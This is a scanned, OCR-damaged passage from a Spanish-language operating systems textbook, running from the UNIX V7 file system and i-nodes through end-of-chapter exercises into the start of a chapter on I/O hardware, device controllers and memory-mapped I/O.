el número del nodo-i para ese archivo (2 bytes), como se muestra en la figura 4-33. Estos paráme¬ 
tros limitan el número de archivos por cada sistema de archivos a 64 K. 

Al igual que el nodo-i de la figura 4-13, los nodos-i de UNIX contienen ciertos atributos, los 
cuales contienen el tamaño del archivo, tres tiempos (hora de creación, de último acceso y de últi¬ 
ma modificación), el propietario, el grupo, información de protección y una cuenta del número de 
entradas de di rector! o que apuntan al nodo-i. El último campo se necesita debido a los vínculos. Ca¬ 
da vez que se crea un nuevo vínculo a un nodo-i, la cuenta en ese nodo-i se incrementa. Cuando se 
elimina un vínculo, la cuenta se decrementa. Cuando llega a 0, el nodo-i se reclama y los bloques 
de disco se devuelven a la lista de bloques libres. 

Para llevar la cuenta délos bloques de disco se utiliza una generalización de la figura 4-13, pa¬ 
ra poder manejar archivos muy grandes. Las primeras 10 direcciones de disco se almacenan en el 
mismo nodo-i, por lo que para los archivos pequeños toda la información necesaria se encuentra 
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Nombre de archivo 


Número 
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Figura 4-33. U na entrada de directorio de U NIX V7. 


justo en el nodo-i, que se obtiene del disco a la memoria principal al momento de abrir el archivo. 
Para archivos un poco más grandes, una de las direcciones en el nodo-i es la dirección de un blo¬ 
que de disco llamado bloque indirecto sencillo. Este bloque contiene direcciones de disco adicio¬ 
nales. Si esto no es suficiente, hay otra dirección en el nodo-i, llamada bloque indirecto doble, que 
contiene la dirección de un bloque que contiene una lista de bloques indirectos sencillos. Cada uno 
de estos bloques indirectos sencillos apunta a unos cuantos cientos de bloques de datos. Si esto aún 
no es suficiente, también se puede utilizar un bloque indirecto triple. El panorama completo se 
muestra en la figura 4-34. 


Nodo-i 



Figura 4-34. U n nodo-i de U NIX. 


Cuando se abre un archivo, el sistema de archivos debe tomar el nombre de archivo suminis¬ 
trado y localizar sus bloques de disco. Ahora consideremos cómo se busca el nombre de la ruta 
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/usr/ast/mbox. Utilizaremos UNIX como un ejemplo, pero el algoritmo es básicamente el mismo 
para todos los sistemas de directorios jerárquicos. En primer lugar, el sistema de archivos locali¬ 
za el directorio raíz. En UNIX, su nodo-i se localiza en un lugar fijo en el disco. De este nodo-i 
localiza el directorio raíz, que puede estar en cualquier parte del disco, pero digamos que está en 
el bloque 1. 

Después lee el directorio raíz y busca el primer componente de la ruta, usr, en el directorio 
raíz para encontrar el número de nodo-i del archivo /usr. La acción de localizar un nodo-i a par¬ 
tir de su número es simple, ya que cada uno tiene una ubicación fija en el disco. A partir de este 
nodo-i, el sistema localiza el directorio para /usr y busca el siguiente componente, ast, en él. 
Cuando encuentra la entrada para ast, tiene el nodo-i para el directorio /usr/ast. A partir de este 
nodo-i puede buscar mbox en el mismo directorio. Después, el nodo-i para este archivo se lee en 
memoria y se mantiene ahí hasta que se cierra el archivo. El proceso de búsqueda se ilustra en la 
figura 4-35. 
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Figura 4-35. Los pasos para buscar /usr/ast/mbox. 


Los nombres de rutas relativas se buscan de la misma forma que las absolutas, sólo que se em¬ 
pieza desde el directorio de trabajo en vez de empezar del directorio raíz. Cada directorio tiene en¬ 
tradas para . y.., que se colocan ahí cuando se crea el directorio. La entrada . tiene el número del 
nodo-i para el directorio actual y la entrada .. tiene el número del nodo-i para el directorio padre. 
Así, un procedimiento que busca ../dick/prog.c simplemente busca .. en el directorio de trabajo, en¬ 
cuentra el número del nodo-i para el directorio padre y busca dick en ese directorio. No se necesita 
un mecanismo especial para manejar estos nombres. En cuanto lo que al sistema de directorios con¬ 
cierne, sólo son cadenasASCII ordinarias, igual que cualquier otro nombre. El único truco aquí es 
que .. en el directorio raíz se apunta a sí mismo. 
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4.6 INVESTIGACIÓN ACERCA 

DE LOSSISTEMAS DE ARCHIVOS 

Los sistemas de archivos siempre han atraído más investigación que ias demás partes dei sistema 
operativo y éste sigue siendo ei caso. Aunque ios sistemas de archivos estándar están muy bien 
comprendidos, aún hay un poco de investigación acerca de cómo optimizar ia administración de ia 
caché de búfer (Burnetty coiaboradores, 2002; Ding y coiaboradores, 2007; Gnaidy y coiaborado- 
res, 2004; Kroegery Long, 2001; Pai y coiaboradores, 2000; y Zhou y coiaboradores, 2001). Se es¬ 
tá reaiizando trabajo acerca de ios nuevos tipos de sistemas de archivos, como ios sistemas de 
archivos a nivei de usuario (M aziéres, 2001), ios sistemas de archivos fiash (Gai y coiaboradores, 
2005), ios sistemas de archivos por bitácora (Prabhakaran y coiaboradores, 2005; y Stein y coiabo¬ 
radores, 2001), ios sistemas de archivos con controi de versiones (Corneii y coiaboradores, 2004), 
ios sistemas de archivos de iguai a iguai (M uthitacharoen y coiaboradores, 2002) y otros. Ei sistema 
de archivos de Googie es también inusuai debido a su gran toierancia a errores (Ghemawat y co¬ 
iaboradores, 2003). También son de interés ias distintas formas de buscar cosas en ios sistemas de 
archivos (Padioieau y Ridoux, 2003). 

Otra área que ha estado obteniendo atención es ia procedencia: iievar un registro dei historiai 
de ios datos, inciuyendo de dónde provinieron, quién es ei propietario y cómo se han transformado 
(M uniswarmy-Reddy y coiaboradores, 2006; y Shah y coiaboradores, 2007). Esta información se 
puede utiiizar de varias formas. La reaiización de respaidos también está recibiendo aigo de aten¬ 
ción (Cox y coiaboradores, 2002; y Rycroft, 2006), ai iguai que ei tema reiacionado de ia recupe¬ 
ración (Keeton y coiaboradores, 2006). Aigo también reiacionado con ios respaidos es ei proceso 
de mantener ios datos disponibies y útiies durante décadas (Baker y coiaboradores, 2006; M aniatis 
y coiaboradores, 2003). La confiabiiidad y ia seguridad también están muy iejos de ser probiemas 
soiucionados (Greenan y M iiier, 2006; Wiresy Feeiey, 2007; Wright y coiaboradores, 2007; y Yang 
y coiaboradores, 2006). Y por úitimo, ei rendimiento siempre ha sido un tema de investigación y io 
sigue siendo (Caudiii y Gavrikovska, 2006; Chiang y Huang, 2007; Stein, 2006; Wang y coiabora¬ 
dores, 2006a; y Zhang y Ghose, 2007). 

4.7 RESUMEN 

Visto desde ei exterior, un sistema de archivos es una coiección de archivos y directorios, más ias 
operaciones que se reaiizan con eiios. Los archivos se pueden ieer y escribir, ios directorios se pue¬ 
den crear y destruir, y ios archivos se pueden mover de un directorio a otro. La mayoría de ios sis¬ 
temas de archivos modernos soportan un sistema de directorios jerárquico en ei cuai ios directorios 
pueden tener subdirectorios y éstos pueden tener subdirectorios en forma infinita. 

Visto desde ei interior, un sistema de archivos tiene una apariencia distinta. Los diseñadores dei 
sistema de archivos se tienen que preocupar acerca de ia forma en que se asigna ei aimacenamien- 
toy cómo ei sistema iieva ei registro de qué bioque va con cuái archivo. Las posibiiidades inciuyen 
archivos contiguos, iistas eniazadas (iigadas), tabias de asignación de archivos y nodos-i. Los dis¬ 
tintos sistemas tienen diferentes estructuras de directorios. Los atributos pueden ir en ios directo¬ 
rios o en aiguna otra parte (por ejempio, en un nodo-i). Ei espacio en ei disco se puede administrar 
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mediante el uso de listas de bloques libres o mapas de bits. La confiabilidad del sistema aumenta al 
realizar vaciados increméntales y tener un programa que pueda reparar sistemas de archivos enfer¬ 
mos. El rendimiento del sistema de archivos es importante y puede mejorarse de varias formas, in¬ 
cluyendo el uso de cachés, la lectura adelantada y la colocación cuidadosa de los bloques de un 
archivo cerca unos de otros. Los sistemas de archivos estructurados por registro también mejoran 
el rendimiento, al realizar escrituras en unidades grandes. 

Algunos ejemplos de sistemas de archivos son ISO 9660, M S-DOS y UNIX. Éstos difieren en 
varias formas, incluyendo la manera en que llevan el registro de qué bloques van con cuál archivo, 
la estructura de los directorios y la administración del espacio libre en el disco. 


PROBLEMAS 

1. En los primeros sistemas UNIX, los archivos ejecutables (archivos a.out) empezaban con un núme¬ 
ro mágico muy específico, no uno elegido al azar. Estos archivos empezaban con un encabezado, 
seguido de los segmentos de texto y de datos. ¿Por qué cree usted que se eligió un número muy 
específico para los archivos ejecutables, mientras que otros tipos de archivos tenían un número má¬ 
gico más o menos aleatorio como la primera palabra? 

2. En la figura 4-4, uno de los atributos es la longitud del registro. ¿Por qué se preocupa el sistema ope¬ 
rativo por esto? 

3. ¿Es absolutamente esencial la llamada al sistema open en UNIX? ¿Cuáles serían las consecuencias 
de no tenerla? 

4. Los sistemas que soportan archivos secuenciales siempre tienen una operación para rebobinar los ar¬ 
chivos. ¿Los sistemas que soportan archivos de acceso aleatorio la necesitan también? 

5. Algunos sistemas operativos proporcionan una llamada al sistema rename para dar a un archivo un 
nuevo nombre. ¿Hay acaso alguna diferencia entre utilizar esta llamada para cambiar el nombre de 
un archivo y sólo copiar el archivo a uno nuevo con el nuevo nombre, eliminando después el archi¬ 
vo anterior? 

6 . En algunos sistemas es posible asociar parte de un archivo a la memoria. ¿Qué restricciones deben 
imponer dichos sistemas? ¿Cómo se implemento esta asociación parcial? 

7. Un sistema operativo simple sólo soporta un directorio, pero permite que ese directorio tenga arbi¬ 
trariamente muchos archivos con nombres de archivos arbitrariamente largos. ¿Puede simularse al¬ 
go aproximado a un sistema de archivos jerárquico? ¿Cómo? 

8 . En U NIX y Windows, el acceso aleatorio se realiza al tener una llamada especial al sistema que mue¬ 
ve el apuntador de la "posición actual" asociado con un archivo a un byte específico en el archivo. 
Proponga una manera alternativa de realizar un acceso aleatorio sin tener esta llamada al sistema. 

9. Considere el árbol de directorios de la figura 4-8. Si /usr/jim es el directorio de trabajo, ¿cuál es el 
nombre de ruta absoluto para el archivo cuyo nombre de ruta relativo es ../ast/x? 

10. La asignación contigua de archivos produce la fragmentación del disco, como se menciona en el tex¬ 
to, debido a que cierto espacio en el último bloque del disco se desperdiciará en los archivos cuya 
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longitud no sea un número entero de bloques. ¿Es esta fragmentación interna o externa? Haga una 
analogía con algo que se haya descrito en el capítulo anterior. 

11. U na manera de utilizar la asignación contigua del disco y no sufrir de huecos es compactar el disco 
cada vez que se elimina un archivo. Como todos los archivos son contiguos, para copiar un archivo 
se requiere una búsqueda y un retraso rotacional para leerlo, seguidos de la transferencia a toda ve¬ 
locidad. Para escribir de vuelta el archivo se requiere el mismo trabajo. Suponiendo un tiempo de 
búsqueda de 5 mseg, un retraso rotacional de 4 mseg, una velocidad de transferencia de 8 M B/seg 
y un tamaño de archivo promedio de 8 KB, ¿cuánto tiempo se requiere para leer un archivo en la 
memoria principal y después escribirlo de vuelta al disco en una nueva ubicación? Utilizando estos 
números, ¿cuánto tiempo se requeriría para compactar la mitad de un disco de 16 GB? 

12. A luz de la respuesta de la pregunta anterior, ¿tiene algún sentido compactar el disco? 

13. Algunos dispositivos digitales para el consumidor necesitan almacenar datos, por ejemplo como ar¬ 
chivos. Nombre un dispositivo moderno que requiera almacenamiento de archivos y para el que la 
asignación contigua sería una excelente idea. 

14. ¿Cómo implementa M S-DOS el acceso aleatorio a los archivos? 

15. Considere el nodo-i que se muestra en la figura 4-13. Si contiene 10 direcciones directas de 4 bytes 
cada una y todos los bloques de disco son de 1024 KB, ¿cuál es el archivo más grande posible? 

16. Se ha sugerido que la eficiencia se podría mejorar y el espacio en disco se podría ahorrar al almace¬ 
nar los datos de un archivo corto dentro del nodo-i. Para el nodo-i de la figura 4-13, ¿cuántos bytes 
de datos podrían almacenarse dentro del nodo-i? 

17. Dos estudiantes de ciencias computacionales, Carolyn y Elinor, están hablando acerca de los nodos- 
i. Carolyn sostiene que el tamaño de las memorias ha aumentado tanto y se han vuelto tan econó¬ 
micas que cuando se abre un archivo, es más simple y rápido obtener una nueva copia del nodo-i y 
colocarla en la tabla de nodos-i, en lugar de buscar en toda la tabla para ver si ya está ahí. Elinor es¬ 
tá en desacuerdo. ¿Quién tiene la razón? 

18. Nombre una ventaja que tienen los vínculos duros (las ligas duras) sobre los vínculos simbólicos (las 
ligas simbólicas) y una ventaja que tienen los vínculos simbólicos sobre los vínculos duros. 

19. El espacio libreen el disco se puede contabilizar mediante el uso de una lista de bloques libres o un 
mapa de bits. Las direcciones de disco requieren D bits. Para un disco con B bloques, F de los cua¬ 
les son libres, indique la condición bajo la cual la lista de bloques libres utiliza menos espacio que el 
mapa de bits. Si D tiene el valor de 16 bits, exprese su respuesta como un porcentaje del espacio en 
el disco que debe estar libre. 

20. El inicio de un mapa de bits de espacio libre tiene la siguiente apariencia después de que se da for¬ 
mato por primera vez a la partición de disco: 1000 0000 0000 0000 (el primer bloque es utilizado 
por el directorio raíz). El sistema siempre busca bloques libres empezando en el bloque de menor 
numeración, por lo que después de escribir el archivo A, que utiliza seis bloques, el mapa de bits se 
ve así: lili 1110 0000 0000. M uestre el mapa de bits después de cada una de las siguientes accio¬ 
nes adicionales: 

(a) Se escribe el archivo B, utilizando cinco bloques 

(b) Se elimina el archivo A 

(c) Se escribe el archivo C, utilizando ocho bloques 

(d) Se elimina el archivo B. 
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21. ¿Qué ocurriría si el mapa de bits o la lista de bloques libres que contiene la información acerca de 
los bloques de disco libres se perdiera por completo debido a una falla? ¿Hay alguna forma de re¬ 
cuperarse de este desastre o definitivamente hay que decir adiós al disco duro? Analice sus respues¬ 
tas para los sistemas de archivos UNIX y FAT-16 por separado. 

22. El trabajo nocturno de Oliver Owl en el centro de cómputo de la universidad es cambiar las cintas 
que se utilizan para los respaldos de datos nocturnos. M ientras espera a que se complete cada cinta, 
trabaja en la escritura de su tesis que demuestra que las obras de Shakespeare fueron escritas por vi¬ 
sitantes extraterrestres. Su procesador de texto se ejecuta en el sistema que se está respaldando, ya 
que es el único que tienen. ¿Hay algún problema con este arreglo? 

23. En el texto analizamos con cierto detalle la forma de realizar vaciados increméntales. En Windows 
es fácil saber cuándo vaciar un archivo, debido a que cada archivo tiene un bit para archivar. Este 
bit no está en U NIX. ¿Cómo saben los programas de respaldo de UNIX qué archivos vaciar? 

24. Suponga que el archivo 21 en la figura 4-25 no se modificó desde la última vez que hubo un vacia¬ 
do. ¿En qué forma deberían ser distintos los cuatro mapas de bits de la figura 4-26? 

25. Se ha sugerido que la primera parte de cada archivo de U NIX debe mantenerse en el mismo bloque 
de disco que su nodo-i. ¿Qué beneficio traería esto? 

26. Considere la figura 4-27. ¿Es posible que para cierto número de bloque específico los contadores en 
ambas listas tengan el valor de 2? ¿Cómo debería corregirse este problema? 

27. El rendimiento de un sistema de archivos depende de la proporción de aciertos de la caché (fracción 
de bloques encontrados en la caché). Si se requiere 1 mseg para satisfacer una solicitud de la caché, 
pero 40 mseg para satisfacer una solicitud si se necesita una lectura de disco, proporcione una fórmu¬ 
la para el tiempo promedio requerido para satisfacer una solicitud si la proporción de aciertos es h. 
G rafique esta función para los valores de h que varían de 0 hasta 1.0. 

28. Considere la idea detrás de la figura 4-21, pero ahora para un disco con un tiempo de búsqueda pro¬ 
medio de 8 mseg, una velocidad rotacional de 15,000 rpm y 262,144 bytes por pista. ¿Cuáles son 
las velocidades de datos para los tamaños de bloque de 1KB,2KB y4KB, respectivamente? 

29. Cierto sistema de archivos utiliza bloques de disco de 2 KB. El tamaño de archivo promedio es de 
1 KB. Si todos los archivos fueran exactamente de 1 KB, ¿qué fracción del espacio en el disco se 
desperdiciaría? ¿Piensa usted que el desperdicio de un sistema de archivos real será mayor que es¬ 
te número o menor? Explique su respuesta. 

30. La tabla FAT-16 de M S-DQS contiene 64K entradas. Suponga que uno de los bits se necesita para 
algún otro propósito, y que la tabla contiene exactamente 32,768 entradas en vez de 64 K. Sin nin¬ 
gún otro cambio, ¿cuál sería el archivo de M S-DQS más grande bajo esta condición? 

31. Los archivos en M S-DQS tienen que competir por el espacio en la tabla FAT-16 en memoria. Si un 
archivo utiliza k entradas, es decir, k entradas que no están disponibles para ningún otro archivo, 
¿qué restricción impone esto sobre la longitud total de todos los archivos combinados? 

32. Un sistema de archivos UNIX tiene bloques de 1 KB y direcciones de disco de 4 bytes. ¿Cuál es el 
tamaño de archivo máximo si los nodos-i contienen 10 entradas directas y una entrada indirecta sen¬ 
cilla, una doble y una triple? 

33. ¿Cuántas operaciones de disco se necesitan para obtener el nodo-i para el archivo/usr/ast/cursos/so- 
/folleto.t? Suponga que el nodo-i para el directorio raíz está en la memoria, pero no hay nada más a 
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lo largo de la ruta en memoria. Suponga también que todos ios directorios caben en un bioque de 
disco. 

34. En muchos sistemas UNIX, los nodos-i se mantienen al inicio del disco. Un diseño alternativo es 
asignar un nodo-i cuando se crea un archivo y colocar el nodo-i al inicio del primer bloque del ar¬ 
chivo. Hable sobre las ventajas y desventajas de esta alternativa. 

35. Escriba un programa que invierta los bytes de un archivo, de manera que el último byte sea ahora el 
primero y el primero sea ahora el último. Debe funcionar con un archivo arbitrariamente largo, pe¬ 
ro trate de hacerlo eficiente de una manera razonable. 

36. Escriba un programa que inicie en un directorio dado y recorra el árbol de archivos desde ese pun¬ 
to hacia abajo, registrando los tamaños de todos los archivos que encuentre. Cuando termine, debe¬ 
rá imprimir un histograma de los tamaños de archivos, utilizando una anchura de contenedor 
especificada como parámetro (por ejemplo, con 1024, los tamaños de archivos de 0 a 1023 van en 
un contenedor, de 1024 a 2047 van en el siguiente contenedor, etcétera). 

37. Escriba un programa que explore todos los directorios en un sistema de archivos U NIX, que busque 
y localice todos los nodos-i con una cuenta de vínculos duros de dos o más. Para cada uno de esos 
archivos debe listar en conjunto todos los nombres de archivos que apunten a ese archivo. 

38. Escriba una nueva versión del programa Is de U NIX. Esta versión debe tomar como argumento uno 
o más nombres de directorios y para cada directorio debe listar todos los archivos que contiene, una 
línea por archivo. Cada campo debe tener un formato razonable, conn base en su tipo. Liste sólo las 
primeras direcciones de disco, si las hay. 
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Además de proporcionar abstracciones como ios procesos (e hiios), espacios de direcciones y ar¬ 
chivos, un sistema operativo también controia todos ios dispositivos de E/S (Entrada/Saiida) de ia 
computadora. Debe emitir comandos para ios dispositivos, captar interrupciones y manejar errores. 
Adicionaimente debe proporcionar una interfaz — simpiey fácii de usar— entre ios dispositivos y 
ei resto dei sistema. Hasta donde sea posibie, ia interfaz debe ser iguai para todos ios dispositivos 
(independencia de dispositivos). Ei código de E/S representa una fracción considerabie dei sistema 
operativo totai. Ei tema de estecapítuio es ia forma en que ei sistema operativo administra ia E/S. 

Este capítuio se organiza de ia siguiente manera. Primero veremos aigunos de ios principios dei 
hardware de E/S y después anaiizaremos ei software de E/S en generai. Ei software de E/S se pue¬ 
de estructurar en niveies, cada uno de ios cuaies tiene una tarea bien definida. A naiizaremos estos 
niveies para describir qué hacen y cómo trabajan en conjunto. 

Después de esa introducción anaiizaremos detai i adámente hardware y software de varios dis¬ 
positivos de E/S: discos, reiojes, teciadosy pantaiias. Porúitimo, consideraremos ia administración 
de ia energía. 


5.1 PRINCIPIOS DEL HARDWARE DE E/S 

Distintas personas ven ei hardware de E/S de diferentes maneras. Los ingenieros eiéctricos io ven en 
términos de chips, cabies, fuentes de poder, motores y todos ios demás componentes físicos que con¬ 
stituyen ei hardware. Los programadores ven ia interfaz que se presenta ai software: ios comandos 
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que acepta el hardware, las funciones que lleva a cabo y los errores que se pueden reportar. En 
este libro nos enfocaremos en la programación de los dispositivos de E/S y no en el diseño, la cons¬ 
trucción o el mantenimiento de los mismos, por lo que nuestro interés se limitará a ver cómo se 
programa el hardware, no cómo funciona por dentro. Sin embargo, la programación de muchos 
dispositivos de E/S a menudo está íntimamente conectada con su operación interna. En las siguien¬ 
tes tres secciones proveeremos un poco de historia general acerca del hardware de E/S y cómo se 
relaciona con la programación. Puede considerarse como un repaso y expansión del material in¬ 
troductorio de la sección 1.4. 

5.1.1 Dispositivos de E/S 

Los dispositivos de E/S se pueden dividir básicamente en dos categorías: dispositivos de bloque y 
dispositivos de carácter. Un dispositivo de bloque almacena información en bloques de tamaño fi¬ 
jo, cada uno con su propia dirección. Los tamaños de bloque comunes varían desde 512 bytes has¬ 
ta 32,768 bytes. Todas las transferencias se realizan en unidades de uno o más bloques completos 
(consecutivos). La propiedad esencial de un dispositivo de bloque es que es posible leer o escribir 
cada bloque de manera independiente de los demás. Los discos duros, CD-ROM s y memorias USBs 
son dispositivos de bloque comunes. 

Como resultado de un análisis más detallado, se puede concluir que no está bien definido el lí¬ 
mite entre los dispositivos que pueden direccionarse por bloques y los que no se pueden direccio- 
nar así. Todos concuerdan en que un disco es un dispositivo direccionable por bloques, debido a que 
no importa dónde se encuentre el brazo en un momento dado, siempre será posible buscar en otro 
cilindro y después esperar a que el bloque requerido gire debajo de la cabeza. A hora considere una 
unidad de cinta utilizada para realizar respaldos de disco. Las cintas contienen una secuencia de blo¬ 
ques. Si la unidad de cinta red be un comando para leer el bloque N, siempre puede rebobinar la cin¬ 
ta y avanzar hasta llegar al bloque N. Esta operación es similar a un disco realizando una búsqueda, 
sólo que requiere mucho más tiempo. Además, puede o no ser posible volver a escribir un bloque 
a mitad de la cinta. Aun si fuera posible utilizar las cintas como dispositivos de bloque de acceso 
aleatorio, es algo que se sale de lo normal: las cintas no se utilizan de esa manera. 

El otro tipo de dispositivo de E/S es el dispositivo de carácter. Un dispositivo de carácter en¬ 
vía o acepta un flujo de caracteres, sin importar la estructura del bloque. No es direccionable y no 
tiene ninguna operación de búsqueda. Las impresoras, las interfaces de red, los ratones (para seña¬ 
lar), las ratas (para los experimentos de laboratorio de psicología) y la mayoría de los demás dispo¬ 
sitivos que no son parecidos al disco se pueden considerar como dispositivos de carácter. 

Este esquema de clasificación no es perfecto. A Igunos dispositivos simplemente no se adaptan. 
Por ejemplo, los relojes no son direccionables por bloques. Tampoco generan ni aceptan flujos de 
caracteres. Todo lo que hacen es producir interrupciones a intervalos bien definidos. Las pantallas 
por asignación de memoria tampoco se adaptan bien al modelo. A ún así, el modelo de dispositivos 
de bloque y de carácter es lo bastante general como para poder utilizarlo como base para hacer que 
parte del sistema operativo que lidia con los dispositivos de E/S sea independiente. Por ejemplo, el 
sistema de archivos sólo se encarga de los dispositivos de bloque abstractos y deja la parte depen¬ 
diente de los dispositivos al software de bajo nivel. 
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Los dispositivos de E/S cubren un ampiio rango de veiocidades, io cuai impone una presión 
considerabie en ei software para obtener un buen desempeño sobre muchos órdenes de magnitud en 
ias veiocidades de transferencia de datos. La figura 5.1 muestra ias veiocidades de transferencia de 
datos de aigunos dispositivos comunes. La mayoría de estos dispositivos tienden a hacerse más rá¬ 
pidos a medida que pasa ei tiempo. 


Dispositivo 

Veiocidad de transferencia de datos 

Teclado 

10 bytes/seg 

Ratón 

100 bytes/seg 

Módem de 56K 

7 KB/seg 

Escáner 

400 KB/seg 

Cámara de video digital 

3.5 MB/seg 

802.llg inalámbrico 

6.75 MB/seg 

CD-ROM de 52X 

7.8 MB/seg 

Fast Ethernet 

12.5 MB/seg 

Tarjeta Compact Flash 

40 MB/seg 

FireWire (IEEE 1394) 

50 MB/seg 

USB 2.0 

60 MB/seg 

Red SONET OC-12 

78 MB/seg 

Disco SCSI Ultra 2 

80 MB/seg 

Gigabit Ethernet 

125 MB/seg 

Unidad de disco SATA 

300 MB/seg 

Cinta de Ultrium 

320 MB/seg 

Bus PCI 

528 MB/seg 


Figura 5-1. Velocidades de transferencia de datos comunes de algunos dispositivos, 
redes y buses. 


5.1.2 C ontroladores de dispositivos 

Por io generai, ias unidades de E/S consisten en un componente mecánico y un componente eiec- 
trónico. A menudo es posibie separar ias dos porciones para proveer un diseño más moduiar y ge¬ 
nerai. Ei componente eiectrónico se iiama controlador de dispositivo o adaptador. En ias 
computadoras personaies, comúnmente tiene ia forma de un chip en ia tarjeta principai o una tarje¬ 
ta de circuito integrado que se puede insertar en una ranura de expansión (PCI). El componente me¬ 
cánico es el dispositivo en sí. Este arreglo se muestra en la figura 1-6. 

La tarjeta controladora por lo general contiene un conectar, en el que se puede conectar 
un cable que conduce al dispositivo en sí. M uchos controladores pueden manejar dos, cuatro o 
inclusive ocho dispositivos idénticos. Si la interfaz entre el controlador y el dispositivo es están¬ 
dar, ya sea un estándar oficial ANSI, IEEE o ISO, o un estándar de facto, entonces las empresas 
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pueden fabricar controladores o dispositivos que se adapten a esa interfaz. Por ejemplo, muchas 
empresas fabrican unidades de disco que coinciden con la interfaz IDE, SATA, SCSI, USB o Fi- 
reWiredEEE 1394). 

La interfaz entre el controlador y el dispositivo es a menudo de muy bajo nivel. Por ejemplo, 
se podría dar formato a un disco con 10,000 sectores de 512 bytes por pista. Sin embargo, lo que 
en realidad sale del disco es un flujo serial de bits, empezando con un preámbulo, después los 4096 
bits en un sector y por último una suma de comprobación, también conocida como Código de Co¬ 
rrección de Errores (ECC). El preámbulo se escribe cuando se da formato al disco y contiene el 
cilindro y número de sector, el tamaño del sector y datos similares, así como información de sin¬ 
cronización. 

El trabajo del controlador es convertir el flujo de bits serial en un bloque de bytes y realizar 
cualquier corrección de errores necesaria. Por lo general, primero se ensambla el bloque de by¬ 
tes, bit por bit, en un búfer dentro del controlador. Después de haber verificado su suma de com¬ 
probación y de que el bloque se haya declarado libre de errores, puede copiarse a la memoria 
principal. 

El controlador para un monitor también funciona como un dispositivo de bits en serie a un ni¬ 
vel igual de bajo. Lee los bytes que contienen los caracteres a mostrar de la memoria y genera las 
señales utilizadas para modular el haz del CRT para hacer que escriba en la pantalla. El controlador 
también genera las señales para que el haz del CRT realice un retrazado horizontal después de ha¬ 
ber terminado una línea de exploración, así como las señales para hacer que realice un retrazado 
vertical después de haber explorado toda la pantalla. Si no fuera por el controlador del CRT, el pro¬ 
gramador del sistema operativo tendría que programar de manera explícita la exploración análoga 
del tubo. Con el controlador, el sistema operativo inicializa el controlador con unos cuantos pará¬ 
metros, como el número de caracteres o píxeles por línea y el número de líneas por pantalla, y de¬ 
ja que el controlador se encargue de manejar el haz. Las pantallasTFT planas funcionan de manera 
diferente, pero son igualmente complicadas. 


5.1.3 E/S por asignación de memoria 

Cada controlador tiene unos cuantos registros que se utilizan para comunicarse con la CPU. Al es¬ 
cribir en ellos, el sistema operativo puede hacer que el dispositivo envíe o acepte datos, se encien¬ 
da o se apague, o realice cualquier otra acción. Al leer de estos registros, el sistema operativo puede 
conocer el estado del dispositivo, si está preparado o no para aceptar un nuevo comando, y sigue 
procediendo de esa manera. 

Además de los registros de control, muchos dispositivos tienen un búfer de datos que el siste¬ 
ma operativo puede leer y escribir. Por ejemplo, una manera común para que las computadoras 
muestren píxeles en la pantalla es tener una RA M de video, la cual es básicamente sólo un búfer de 
datos disponible para que los programas o el sistema operativo escriban en él. 

De todo esto surge la cuestión acerca de cómo se comunica la CPU con los registros de con¬ 
trol y los búferes de datos de los dispositivos. Existen dos alternativas. En el primer método, a ca¬ 
da registro de control se le asigna un número de puerto de E/S, un entero de 8 o 16 bits. El conjunto 
de todos los puertos de E/S forma el espacio de puertos de E/S y está protegido de manera que los 
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programas de usuario ordinarios no puedan utiiizario (sóio ei sistema operativo puede). M ediante 
ei uso de una instrucción especiai de E/S tai como 

IN REG,PUERTO, 

ia CPU puede ieer ei registro de controi puerto y aimacenar ei resuitado en ei registro de ia CPU 
iiamado reg. De manera simiiar, mediante ei uso de 

OUT PUERTO, REG 

ia CPU puede escribir ei contenido de reg en un registro de controi. La mayoría de ias primeras 
computadoras, inciuyendo a casi todas ias mainframes, como ia IBM 360 y todas sus sucesoras, tra¬ 
bajaban de esta manera. 

En este esquema, los espacios de direcciones para la memoria y la E/S son distintos, como se 
muestra en la figura 5-2(a). Las instrucciones 

IN R0,4 

y 

MOV R0,4 

son completamente distintas en este diseño. La primera lee el contenido del puerto 4 de E/S y lo colo¬ 
ca en RO, mientras que la segunda lee el contenido de la palabra de memoria 4 y lo coloca en ro. Los 
4s en estos ejemplos se refieren a espacios de direcciones distintos y que no están relacionados. 

Dos direcciones Espacio de una dirección Dos espacios de direcciones 




Figura 5-2. (a) Espacio separado de E/S y memoria, (b) E/S por asignación de me¬ 
moria. (c) Híbrido. 

El segundo método, que se introdujo con la PDP-11, es asignar todos los registros de control al 
espacio de memoria, como se muestra en la figura 5-2(b). A cada registro de control se le asigna 
una dirección de memoria única a la cual no hay memoria asignada. Este sistema se conoce como 
E/S con asignación de memoria (mapped-memory). Por lo general, las direcciones asignadas se 
encuentran en la parte superior del espacio de direcciones. En la figura 5-2(c) se muestra un esque¬ 
ma híbrido, con búferes de datos de E/S por asignación de memoria y puertos de E/S separados pa¬ 
ra los registros de control. El Pentium utiliza esta arquitectura, donde las direcciones de 640K a IM 
se reservan para los búferes de datos de los dispositivos en las IBM PC compatibles, además de los 
puertos de E/S de0a64K. 





















334 


ENTRADA/SALIDA 


CAPITULO 5 


¿Cómo funcionan estos esquemas? En todos los casos, cuando la CPU desea leer una palabra, 
ya sea de la memoria o de un puerto de E/S, coloca la dirección que necesita en las líneas de dirección 
del bus y después impone una señal REAoen una línea de control del bus. Se utiliza una segunda línea 
de señal para indicar si se necesita espacio de E/S o de memoria. Si es espacio de memoria, ésta res¬ 
ponde a la petición. Si es espacio de E/S, el dispositivo de E/S responde a la petición. Si sólo hay 
espacio de memoria [como en la figura 5-2(b)], todos los módulos de memoria y todos los disposi¬ 
tivos de E/S comparan las líneas de dirección con el rango de direcciones a las que dan servicio. Si 
la dirección está en su rango, responde a la petición. Como ninguna dirección se asigna tanto a la me¬ 
moria como a un dispositivo de E/S, no hay ambigüedad ni conflicto. 

Los dos esquemas para direccionar los controladores tienen distintos puntos fuertes y débiles. 
Vamos a empezar con las ventajas de la E/S por asignación de memoria. En primer lugar, si se ne¬ 
cesitan instrucciones de E/S especiales para leer y escribir en los registros de control, para acceder 
a ellos se requiere el uso de código ensamblador, ya que no hay forma de ejecutar una instrucción 
iN o ouT en C o C-i-i-. AI llamar a dicho procedimiento se agrega sobrecarga para controlar la E/S. 
En contraste, con la E/S por asignación de memoria los registros de control de dispositivos son só¬ 
lo variables en memoria y se pueden direccionar en C de la misma forma que cualquier otra varia¬ 
ble. Así, con la E/S por asignación de memoria, un controlador de dispositivo de E/S puede 
escribirse completamente en C. Sin la E/S por asignación de memoria se requiere cierto código en¬ 
samblador. 

En segundo lugar, con la E/S por asignación de memoria no se requiere un mecanismo de protec¬ 
